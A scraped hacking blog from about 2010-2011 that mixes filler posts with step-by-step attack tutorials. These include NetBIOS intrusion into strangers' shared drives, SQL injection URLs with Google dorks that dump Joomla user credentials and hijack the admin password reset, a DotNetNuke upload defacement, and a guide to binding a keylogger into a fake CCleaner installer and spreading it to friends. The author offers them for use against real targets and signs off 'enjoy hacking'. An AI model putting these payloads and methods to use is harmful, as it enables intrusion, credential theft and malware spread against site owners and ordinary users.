What the hell is XSS?! All of you still wondering ?


XSS may refer to Cross-site Scripting, is a vulnerability in web applications, using this attacker can steal users' information such as Card Credit, Bank Account information, Paypal Account and other personal information. All the personal credentials may be stolen through any kind of exploitation. Cookies and phishing page or login also can be use in exploitations.


Stay tuned.


THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.


STEP-BY-STEP NETBIOS HACKING PROCEDURE
  1. Open command prompt
  2. In the command prompt use the “net view” command
  3. ( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
    Example :
    C:\>net view \\219.64.55.112
    The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.
  4. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
  5. Example-1 :
    C:\>net use D: \\219.64.55.112\F
    Example-2 :
    C:\>net use G: \\219.64.55.112\SharedDocs
    Example-3 :
    C:\>net use I: \\219.64.55.112\Myprint
    NOTE : In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
    NOTE : GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
    F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.
  6. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.
NOTE : If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.
HAPPY NETBOS HACKING!!

This tutorial will tell you how to hack yahoo messenger while you are engaged in chatting with some person. While you are chatting through yahoo messenger, Yahoo will hide the IP addresses of all the computers that are connected through the yahoo messenger application to the chat room. So it is not possible to directly find out the IP of the person you want to hack. Then how to get the IP address? Yes it is still possible to hack the IP address during the Yahoo messenger chat. The procedure to Hack Yahoo messenger is discussed in detail below.

While you are chatting via yahoo messenger the communication between you and the person you want to hack, takes place indirectly via Yahoo server and not directly. It is not possible to hack Yahoo messenger directly to get the IP address. So to hack his IP, you must establish a direct communication with him. So ,how to do this? It’s easy. Just start chatting with some one via Yahoo messenger. During the process of chatting send him a big file. Now the file transfer takes place directly between your computer and the victim’s computer (via yahoo messenger application).


So now, you are ready to go. Here’s the step-by-step process to hack Yahoo messenger and get the IP address of the person .
  • Go to the Command Prompt (start -> run -> type cmd).
  • Here Type “netstat -n” (without quotes).
NOTE : If you are new to “netstat” and other IP related commands refer this tutorial : Windows XP IP Utilities.
  • The pic given below shows netstat results of my computer. I was not chatting when i took this pic and hence it looks modified.

  • Here local address is your own IP and the foreign address is the IP address of the recipient with whom you are connected via yahoo messenger (There may be multiple recipients and hence multiple foreign addresses).
  • Now send him the file.
  • Check the output by typing the command “netstat -n” (without quotes).
  • Assume the output is something like this.
TCP 127.0.0.10:5101 124.55.23.11:1246 ESTABLISHED
Here 124.55.23.11 is the IP address of the person with whom you are chatting and 1246 is the port number where connection is established. That’s It! You have now hacked Yahoo messenger to get his IP address.
Once you hack Yahoo messenger and get his IP address you can use any of the Remote Administration tools or perform NETBIOS HACKING.
NOTE : Some times there are chances where in the file transfer gets encrypted (takes place via yahoo server itself). So in this case the above hack may fail to work.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

  1. Open the command prompt (Start -> Run -> type cmd -> Enter)
  2. Now type net user and hit Enter
  3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
  4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

After having seen The Social Network I got the urge to look further into the rating model they used to rate girls on Facemash.
After some research I found out that the model is called the ELO rating system. It was developed by Arpad Elo and is a way to calculate the differences in strenght between 2 players – like in Chess. It’s impossible to calculate the exact outcome of any 2 player game but looking on wins, losses and draws against other players you can calculate the expected outcome by using the ELO system. You can read much more about the mathematical details on Wiki.


As was said at the news of splashy, founder and builder of social networking site Facebook, Mark Zuckerberg has stated its intention to close the social pages on 15 March due to problems arising since the emergence of social sites. Many problems arise from the emergence in 2004 until now. Now Mark is planning to open a new social networking site is more developed and interesting than facebook now.
There are some sources say that these young millionaires need some facebook profiles of each country to move to its new social networking site to just download SaveFacebook1.6 or keep in touch with technical support.


Save Facebook v1.6 - Download


P / Sthis information was copied from another websites to spread to all my friends. Any errors of this information, we apologize in advance.

After doing a little checking in the template, done some editing. All the bugs have been fixed to normal.

BUGS :

  • Every posts and pages was not WYSIWYG as in post editor.
P/S - Gonna to fix it as soon as possible. 

I'm just finished restructure my blog's categories so it's will look much more cleaner and simple. So, what you all want to says about it? Comment it.

Facebook Rubbishes March 15 Shutdown Rumors
"We're just getting started", Facebook responds to news report.
A tabloid called Weekly World News has become quite popular over the weekend after it published a news story about Facebook shutting down on March 15. The reason for the shutdown was absurdly cited as, Mark Zuckerberg, CEO of Facebook "wanted his life back" and desired "to put end to all the madness". Zuckerberg is supposed to have made this statement at a press conference outside the social network's Palo Alto office.
The Tabloid, which is known for publishing fake news stories, seems to have tried a spin on the ever-growing social network, Facebook. "Facebook has gotten out of control," said Zuckerberg in a press conference outside his Palo Alto office," and the stress of managing this company has ruined my life. I need to put an end to all the madness,"
Facebook has squashed this silly and ridiculous rumor with a status message : We didn't get the memo about shutting down, so we'll keep working away like always. We aren't going anywhere; we're just getting started. Facebook Director of Corporate Communications Larry Yu confirmed that the rumor is false. In response to Mashable's mail about the shutdown, Yu responded, "The answer is no, so please help us put an end to this silliness."


STAR WARS : THE COMPLETE SAGA ON BLU-RAY Trailer


Reviews :
Star Wars Movie is a film that was included in the model because of many Star Wars fans in the world with millions of people who do not will come out in any package, it is also to accumulation of fans over the years.

However, in the total story of the movie Star Wars The Complete Saga This is not like once the past due is collected from Episodes I-VI all 9 Discs with a film 6 Discs and Special Features another 3 Discs all Ae Dog packed. With high-quality data collected by the original of George Lucas since 1977, put in digital format and adjust various light tone to blend every part.

If you love Star Wars and think of Luke Skywalker (Mark Hamill), Han Solo (Harrison Ford), Princess Leia Organa (Carrie Fisher), Chewbacca (Peter Mayhew), Obi-Wan Kenobi (Ewan McGregor), Padmé (Natalie Portman). , Qui-Gon Jinn (Liam Neeson), Anakin Skywalker (Hayden Christensen). Star Wars: The Complete Saga Episodes I-VI Blu-ray from the collection by George Lucas since that is the best collection of Star wars actually.

The best collection by George Lucas.

Vulnerable on "com_ignitegallery"


Here the steps :
  1. Find target on Google using this dork --> inurl:index.php?option=com_ignitegallery
    Example --> http://target.com/index.php?option=com_ignitegallery&Itemid=57
  2. Make some adjustment and put the red-long-url at the back of the url --> ?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3a,usertype,0x3c62723e%29,4,5,6,7,8,9,10+from+jos_users--
    Example --> http://target/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cemail%2C0x3a%2Cactivation%2C0x3a%2Cusertype%2C0x3c62723e%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users--
  3. Focus on the change -->
    target:89143e2af0df46bd73034bba7caf27e4:OqGo1BDqKhOz7nPI18Xf3JSILKwsEe9s:target@gmail.com:
  4. Make another adjustment on the url again and put this --> ?option=com_user&view=reset
    Example --> http://target.com/index.php?option=com_user&view=reset
  5. Insert the target's email
    Example --> target@gmail.com
  6. Open new tab on the browser, make adjustment on the url --> ?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3a,usertype,0x3c62723e%29,4,5,6,7,8,9,10+from+jos_users--
    Example --> http://target.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1%2C2%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cemail%2C0x3a%2Cactivation%2C0x3a%2Cusertype%2C0x3c62723e%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+jos_users--
  7. Insert the target's token Example --> 89143e2af0df46bd73034bba7caf27e4
    ** Where you find the token? follow the colour that i have matched above.
Finish! It will reset the admin password.


Happy trying and enjoy hacking. :)

Thank you for still willing to follow this blog. Hope you guys will follow and will continue to be a follower of this blog.


From,
XAND™ Admin

Hello friends today i will explain you how to hack the Facebook password or accounts remotely usingkeylogger. Its a 100% working hack and you can easily hack anyone's Facebook account or password using this hack. In this tutorial i will explain you how to hack Facebook and other passwords of any user using 100% FUD keylogger. The keylogger in this tutorial we will discuss is L33ts keylogger and its 100% FUD(fully undetectable).

Hacking Facebook account
 is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.

NOTE: This tutorial is for Educational purposes only i.e. to make you aware how hackers hack your Facebook accounts. Please don't misuse it. I and Isoftdl is not responsible for any damage caused by you. 

 So guys lets start hacking Facebook account or passwords....
Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.


Step 1. Creating the Keylogger Server
1. Download the keylogger.
2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

hack facebook password,how to hack facebook,how to hack a facebook account

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.


Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker. 
3. Now in menu there is one action button click on it and then click save all resources.

how to hack facebook passwords,facebook hack, how to hack into someones facebook


4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).


Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.

facebook password hack,how to hack someones facebook,facebook password hacker,facebook hacking


5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.


Step4 : How to Spread Keylogger or send it to victim or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it. 
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes. 

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked softwares and don't download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.

WiFi Slax Wireless Hacking Live-CD v3.1 + Plugins Updated 10/11/2010
http://topzaits.com/apps/18267-wifi-slax-wireless-hacking-live-cd-v3-1-plugins-updated.html


Click to enlarge

Size : 635.24 MB
Reviews :WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of strong encryption while a 128 bit key has 104. The IV is placed in encrypted frames header, and is transmitted in plain text. 
Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets? a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key. 


Basic Directions :
  1. Boot from cd 
  2. Get the WEP key 
  3. Write it down 
  4. Reboot into windows 
  5. Connect using WEP key. 
HOTFILE :
http://hotfile.com/dl/95072006/d08df3f/Audit0r-200605-02-ipw2100-2.ROLANTONiO.part1.rar.html
http://hotfile.com/dl/95073190/cc272ce/Audit0r-200605-02-ipw2100-2.ROLANTONiO.part2.rar.html
http://hotfile.com/dl/95073185/73fe76a/Audit0r-200605-02-ipw2100-2.ROLANTONiO.part3.rar.html
http://hotfile.com/dl/95072935/edb1d4d/Audit0r-200605-02-ipw2100-2.ROLANTONiO.part4.rar.html

X7 :
http://x7.to/ihnk4l/Audit0r-200605-02-ipw2100-2.ROLANTONiO.part1.rar
http://x7.to/9789lq/Audit0r-200605-02-ipw2100-2.ROLANTONiO.part2.rar
http://x7.to/jg6rv5/Audit0r-200605-02-ipw2100-2.ROLANTONiO.part3.rar
http://x7.to/bknh4k/Audit0r-200605-02-ipw2100-2.ROLANTONiO.part4.rar

LINKS ARE INTERCHANGEABLE, UNRAR AND BURN THE ISO








Wireless Hacking Tools 2011

Size : 156.63 MB

Reviews :


  1. Wireless hacking tool AIO 2009 edition with a few tweaks by tweaker so updated to 2011
  2. Airodump and Airongcrack etc. to get WEP and WPA password
  3. WiPhire
Airodump is an 802.11 packet capture program that is designed to "capture as much encrypted traffic as possible...each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack on the resulting capture file. aircrack will then perform a set of statistical attacks developed by a talented hacker named KoreK."

WiPhire is a Bash script aimed at making the Wireless Hacking process a lot easier. This script was written on Backtrack 4 and designed to be used with Backtrack 4. This script was also designed to be used with the Alfa AWUS036H Wireless adapter with the RTL8187 chipset. If you do not have this chipset but another adapter that is compatible with the aircrack-ng suite you will need to put it into monitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. This script needs to be ran as root.

These are the functions of the script :

autoMACtic MAC spoofer
Ability to crack WEP networks
Ability to crack WPA networks
Perform simple MITM attacks
DNSspoof a network
Use airdrop-ng to create a jammer
Programs that WiPhire Uses :

airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
airdrop-ng
xterm
crunch
pyrit
sslstrip
arpspoof
macchanger
kate
apache2
ettercap
Firefox

If a virus alert occurs disregard that as for these are hacking tools and they will be flagged as virus's no matter what.


You may also should see this :

Oh well! where i can find a template for blogspot that have a attractive and simple design?
In searching of this again, and there a lot of good and nice template but there is no suitable with the theme of my blog... anyone have ideas where i can find one good template? kindly, do share info to me k... Thanks!

PHP
  • inurl:(0x3a,version
  • inurl:(@version,0x3a,databse)
  • inurl:(user,0x3a,pass)
  • inurl:+union+select+ from
  • inurl:+union+select+ pass

The Steps :
  1. Open www.Google.com and search for this - inurl:/forums.asp?iFor=
  2. Example's target - http://www.target.com/forum/forums.asp?iFor=
  3. Delete = symbol just like this - http://www.target.com/forum/forums.asp?iFor
  4. * If it is not working, find another target.
  5. Insert the Injection SQL after the = symbol that you have delete it - 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users
  6. Example- http://www.target.com/forum/forums.asp?iFor=12+union+select+1%2C2%2C3%2Cu_password%2C5%2Cu_id%2C7%2C8%2C9%2C10%2C1 1,12+from+users
  7. Word that come out below 10 TOPICS is the Username and the word come out below the DATED is the Password.
  8. You now can login at above of table 10 TOPICS / DATED.
Happy trying and enjoy hacking. :)

What is MD5 if you ask?
In cryptography, MD5 (Message-Digest algorithm 5) is a widely-used cryptographic hash function with a 128-bit hash value. MD5 was designed by Ronald Rivest in 1991 to replace an earlier hash function, MD4. As an Internet standard, MD5 has been employed in a wide variety of security applications, and is also commonly used to check the integrity of files.



So, what is MD5 Decrypter do?
It will convert the MD5 Hashes into text / cracked / decrypted.


Example :

  1. dd01fb00cc291c7d19c88c9bc7e92987 = littleblackdress
  2. a91a5f994f9d93455c619e932c0d9525 = frisquette26
  3. d8b4c18bc2f9b57e4cc14150ebdc265f = mariusica

List of MD5 Decrypter still online :-

Step by step :
  1. Prepare a deface file text. Example - http://www.anphucinvestment.vn/Portals/0/A13D77.txt
  2. Find dork on www.Google.com - inurl:”/portals/0?
  3. Example target - http://www.target.com/Portals/0/...
  4. Edit the url so will be like this - http://www.target.com/
  5. Add this at the end of the url - /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  6. Example - http://www.target.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  7. Marks on >> File ( A File On Your Site )
  8. Then, delete the URL link - http://www.target.com/Providers/..gallery.aspx
  9. Insert this JavaScript to the link that you have delete earlier - javascript:__doPostBack('ctlURL$cmdUpload','') ENTER!
  10. And lastly, upload the file which that I had told you to prepare on Step 1.
Happy trying and enjoy hacking. :)

INFORMATION :-
Copy & Paste - /index.php or Change --> Example that have been changed (0x3a,username,0x3a,email,0x3a,activation)
just on url address of victim site.
Steps :
  1. Find any site with ERROR (www.Google.com) - inurl:jos_users" inurl:"index.php
  2. To make you are just like forgot password. - /index.php?option=com_user&view=reset
  3. Its Find E-Mail - (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
  4. Its Find Username - (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
  5. Its Find Admin Profile - (username,0x3a,password)
  6. Its Find Token - (0x3a,username,0x3a,email,0x3a,0x3a,activation)
  7. Its Find Login/Outlogin - index.php?option=com_user&view=login
* inurl:"option=com_juser"
* its find error sites, Some Site :-
- (0x3a,username,0x3a,email,0x3a,0x3a,activation)
- (0x3a,username,0x3a,email,0x3a,activation)


Happy trying and enjoy hacking. :)


P/S - From the steps or procedures, it is look like something wrong... anyway, give me a comment if there is a problem in defacing joomla site. So i can make a new tutorial for joomla hacking tricks.

Related Posts Plugin for WordPress, Blogger...
© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.

Networked Blog

Follow Me